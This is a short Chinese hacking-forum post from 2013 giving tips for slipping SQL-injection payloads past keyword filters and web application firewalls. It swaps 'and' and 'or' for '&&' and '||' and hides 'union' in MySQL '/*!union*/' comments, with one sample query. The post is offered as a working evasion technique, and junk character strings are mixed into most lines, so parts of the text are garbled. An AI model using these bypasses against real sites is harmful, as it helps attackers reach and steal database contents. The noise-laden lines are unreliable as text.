找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2065|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.and 用&& 代替& f' Q; R+ _) p# o
( Q6 B$ [8 j- {/ J' b' C
2. or 用||代替
8 l- w$ q# c1 b- A, _7 h0 N  @- a
* Q- y2 A, D3 b3.union select from 变成 /*!union*/这种。" h: _1 F( v1 ^$ j% g: {6 ]
. F6 i& o. c  `. K" M
一个例子:
9 n; i% Z" X5 @
( B6 ~3 a$ O' f: h9 R& `/ select 1 /*!union*/ select 2 from adad where 1&&1- {) o0 \  @! D  _/ `

5 D8 I2 @/ y8 D: T) G. i摘自 it_security
6 M2 h4 N2 T% ^" E( J
; S8 x0 u$ _! P; L0 Z- k* g绕过waf的一个思路
: }' k/ v0 b$ C& u5 {- G$ |
3 B% Q$ h5 j3 v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表